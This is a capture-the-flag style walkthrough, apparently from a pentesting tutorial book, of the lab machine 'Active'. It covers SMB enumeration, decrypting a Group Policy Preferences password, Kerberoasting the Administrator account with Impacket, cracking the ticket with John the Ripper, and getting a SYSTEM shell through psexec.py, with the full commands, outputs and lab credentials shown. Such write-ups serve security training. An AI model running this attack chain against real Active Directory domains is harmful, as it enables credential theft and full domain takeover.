Exercise: Enumerating and exploiting AD on Active

We will have a look at another Active Directory case study. Active involves enumeration of SMB and getting a password from a Group Policy Preferences file Groups.xml. With this, we can enumerate users in Active Directory and using Bloodhound again, identify a user that is Kerberoastable. With that, we get an administrative access on the box.

Running nmap, we find a likely domain controller running Windows Server 2008 R2 SP1.

PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos 
    (server time: 2021-01-14 02:58:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP 
    (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP 
    (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5607/tcp filtered unknown
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; 
    CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m44s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-01-14T02:59:29
|_ start_date: 2021-01-14T02:21:56

Running smbmap to explore SMB, we get the following shares:

┌─[oztechmuse@parrot]─[~/boxes/Active]
└──╼ $smbmap -H active.htb
[+] IP: active.htb:445 Name: unknown
 Disk        Permissions Comment
 ----        ----------- -------
 ADMIN$      NO ACCESS   Remote Admin
 C$          NO ACCESS   Default share
 IPC$        NO ACCESS   Remote IPC
 NETLOGON    NO ACCESS   Logon server share
 Replication READ ONLY
 SYSVOL      NO ACCESS   Logon server share
 Users       NO ACCESS

We can use smbmap to recursively list all directories and files using the -R flag. We can do this on the Replication share.

┌─[rin@parrot]─[~/boxes/Active]
└──╼ $smbmap -H active.htb -R Replication --depth 10
[+] IP: active.htb:445 Name: unknown
 Disk Permissions Comment
 ---- ----------- -------
 Replication READ ONLY
 .\Replication\*
 dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
 dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
 dr--r--r-- 0 Sat Jul 21 18:37:44 2018 active.htb
<NSNIP>
 .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
  \MACHINE\Preferences\Groups\*
 dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
 dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
 fr--r--r-- 533 Sat Jul 21 18:38:11 2018 Groups.xml
<SNIP>

The interesting file here is Groups.xml which is a file that stores Group Policy Preferences which we can retrieve with smbmap:

┌─[✗]─[rin@parrot]─[~/boxes/Active]
└──╼ $smbmap -H active.htb \
--download 'Replication\active.htb\Policies\
{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml'
[+] Starting download: Replication\active.htb\Policies\
{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml 
(533 bytes)
[+] File output: <SNIP>

Before we go on, we should talk about Group Policy in an Active Directory environment. Group Policy is a management technology that allows centralized control over user and computer security settings. A Group Policy Object is a logical container that consists of a Group Policy container and a Group Policy template. Templates are stored on the System Volume (SYSVOL) of each domain controller. Containers are stored in the domain partition of Active Directory. In terms of synchronizing Group Policy Objects to other domain controllers, Active Directory replication is responsible for replicating the containers and File Replication Services (FRS) or Distributed File System Replication (DFSR) is responsible for replicating the SYSVOL.

Group policy is applied to computers and users by the Group Policy client-side extensions. Group Policy Preferences are client side preferences that are saved for a user and as such are extensions of Group Policy. They determine things like environment variables, drive mappings, folder settings, configured printers, start menu, etc. Passwords used to be able to be stored in Group Policy Preference files and these were encrypted using a key that has subsequently become widely available after Microsoft publicly disclosed it (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be).

Looking at the Groups.xml file, we see

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
 <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" 
       name="active.htb\SVC_TGS" image="2" 
       changed="2018-07-18 20:46:06" 
       uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
 <Properties action="U" newName="" fullName="" 
             description="" 
             cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+
             ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" 
             changeLogon="0" noChange="1" neverExpires="1" 
             acctDisabled="0" userName="active.htb\SVC_TGS"/>
 </User>
</Groups>

The file contains a password hash (cpassword) for the user SVC_TGS. You can decrypt this using a utility gpp-decrypt.py (https://github.com/t0thkr1s/gpp-decrypt/blob/master/gpp-decrypt.py) or by using cryptii.com as shown below.

Decrypting the cpasssword from Groups.xml. The text is base64 decoded and then decrypted using AES-256 using the published key.

This gives us the password for svc_tgs of GPPstillStandingStrong2k18 (a commentary on the vulnerability that still existed in 2018). We now have read access to the Users directory and can get the user flag in c:\Users\SVC_TGS\Desktop\users.txt by using smbclient.

┌─[rin@parrot]─[~/boxes/Active]
└──╼ $smbmap -H active.htb -u 'svc_tgs' -p GPPstillStandingStrong2k18
[+] IP: active.htb:445 Name: unknown
 Disk Permissions Comment
 ---- ----------- -------
 ADMIN$ NO ACCESS Remote Admin
 C$ NO ACCESS Default share
 IPC$ NO ACCESS Remote IPC
 NETLOGON READ ONLY Logon server share
 Replication READ ONLY
 SYSVOL READ ONLY Logon server share
 Users READ ONLY
┌─[✗]─[rin@parrot]─[~/boxes/Active]
└──╼ $smbclient -U 'svc_tgs' //active.htb/users
Enter WORKGROUP\svc_tgs's password:
Try "help" to get a list of possible commands.
smb: \> dir
 . DR 0 Sat Jul 21 22:39:20 2018
 .. DR 0 Sat Jul 21 22:39:20 2018
 Administrator D 0 Mon Jul 16 18:14:21 2018
 All Users DHSrn 0 Tue Jul 14 13:06:44 2009
 Default DHR 0 Tue Jul 14 14:38:21 2009
 Default User DHSrn 0 Tue Jul 14 13:06:44 2009
 desktop.ini AHS 174 Tue Jul 14 12:57:55 2009
 Public DR 0 Tue Jul 14 12:57:55 2009
 SVC_TGS D 0 Sat Jul 21 23:16:32 2018
 10459647 blocks of size 4096. 4925485 blocks available
smb: \>

We can see from the home directories that there are likely at least 2 users: SVC_TGS and Administrator. We can enumerate the AD users using ldapsearch:

┌─[rin@parrot]─[~/boxes/Active]
└──╼ $ldapsearch -h active.htb -x -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' \
-b "dc=active,dc=htb" "(&(objectClass=user)(!(objectClass=computer)))" \
samaccountname | grep -i samaccountname
# requesting: samaccountname
sAMAccountName: Administrator
sAMAccountName: Guest
sAMAccountName: krbtgt
sAMAccountName: SVC_TGS
and GetADUsers.py
┌─[rin@parrot]─[~/boxes/Active]
└──╼ $GetADUsers.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -all
Impacket  - Copyright 2020 SecureAuth Corporation
[*] Querying active.htb for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ---------------- ------------------- -------------
Administrator 2018-07-19 03:06:40.351723 2018-07-31 01:17:40.656520
Guest <never> <never>
krbtgt 2018-07-19 02:50:36.972031 <never>
SVC_TGS 2018-07-19 04:14:38.402764 2018-07-21 22:01:30.320277

Both of these approaches show that we have the three manin users we are interested in SVC_TGS, Administrator and krbtgt, the Kerberos user. We can again explore AD using BloodHound. This time, we will do it from Windows. The instructions for installation on Windows are on the BloodHound documents site (https://bloodhound.readthedocs.io/en/latest/installation/windows.html). To collect the data, we will use SharpHound.exe and we can run that from a command prompt that has authenticated with the domain. We can add active.htb as a hosts entry in the hosts file at c:\Windows\System32\drivers\etc\hosts.

From a command prompt, run a cmd.exe using the command:

C:\> runas /netonly /user:active.htb\svc_tgs cmd.exe

Enter the password for the user when prompted. This will open a separate window with the title saying that cmd,exe (running as active.htb\svc_tgs). You can verify that this is running correctly by listing the Users directory. If all has worke correctly, you will not be prompted for a username or password:

c:\Users\rin\boxes\Active>dir \\10.129.81.55\Users
 Volume in drive \\10.129.81.55\Users has no label.
 Volume Serial Number is 2AF3-72E4
 Directory of \\10.129.81.55\Users
07/21/2018 10:39 PM <DIR> .
07/21/2018 10:39 PM <DIR> ..
07/16/2018 06:14 PM <DIR> Administrator
07/14/2009 12:57 PM <DIR> Public
07/21/2018 11:16 PM <DIR> SVC_TGS
 0 File(s) 0 bytes
 5 Dir(s) 20,165,267,456 bytes free

From this cmd prompt, we can run SharpHound to get a set of JSON files that are in a ZIP file.

c:\Users\rin\boxes\Active>.\SharpHound.exe -d active.htb
-----------------------------------------------
Initializing SharpHound at 2:03 PM on 1/14/2021
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, 
    LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain ACTIVE.HTB using path CN=Schema,
    CN=Configuration,DC=ACTIVE,DC=HTB
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 46 objects finished (+46 7.666667)/s -- Using 26 MB RAM
Enumeration finished in 00:00:06.5475076
Compressing data to .\20210114140331_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 2:03 PM on 1/14/2021! Happy Graphing!

Once this is done, we can launch BloodHound, upload the zip file and then run queries to explore the domain. If we run the query, List all Kerberoastable Accounts, we find that Administrator is kerberoastable. This means that the account has an associated SPN (Service Principle Name).

Another way of doing this is to run the Impacket tool GetUserSPNs. This will do an LDAP query to retrieve the SPNs for any active user accounts and once it has obtained them, will request a service ticket from the TGS for the SPN.

┌─[rin@parrot]─[~/boxes/Active]
└──╼ $GetUserSPNs.py -request active.htb/svc_tgs:GPPstillStandingStrong2k18
Impacket  - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,
    DC=active,DC=htb 2018-07-19 03:06:40.351723 2018-07-31 01:17:40.656520
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$747cecdf774ef
43de5898565b46b052f$ee66d6d688a824efdbe603c6e72bd82ff38da9a38e0c8defde5ce8582
1a5a8b71848dcc637f9b8e860801f5e3e361fb79e4abb97e250c94aaeb3482f93b3cef6f3360c
587f9d6136fc3eeb2a6c44349071e9be126065dee4f57474597fc6aa08d98ea0b3a31cc9bbadf
...<SNIP>

As Administrator had an SPN which was "active/CIFS:445" we got a service ticket that we can now try and crack with John The Ripper:

┌─[rin@parrot]─[~/boxes/Active]
└──╼ $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)

That gives us a password Ticketmaster1968 which we can use with psexec.py to get remote command shell on the box.

┌─[✗]─[rin@parrot]─[~/boxes/Active]
└──╼ $psexec.py active.htb/Administrator:[email protected]
Impacket - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.129.26.7.....
[*] Found writable share ADMIN$
[*] Uploading file mDNtlaXF.exe
[*] Opening SVCManager on 10.129.26.7.....
[*] Creating service MkZv on 10.129.26.7.....
[*] Starting service MkZv.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system

You can find users with SPNs using an ldapsearch:

┌─[rin@parrot]─[~/boxes/Active]
└──╼ $ldapsearch -h active.htb -x -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' \
-b "dc=active,dc=htb" \
"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512) \
(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))" \
sAMAccountName ServicePrincipalName | \
grep 'sAMAccountName:\|servicePrincipalName:'
sAMAccountName: Administrator
servicePrincipalName: active/CIFS:445

The interesting thing about the query is the use of the userAccountControl attribute which is a bit mask that has multiple values (http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm). In this case, the query is checking that the account is not disabled (2) and that it is a normal account (512). The userAccountControl attribute can also be queried to check whether the account does not require preauth (4194304).

PreviousExercise: Enumerating and exploiting AD on Forest NextFinal Thoughts

Last updated 4 years ago

Was this helpful?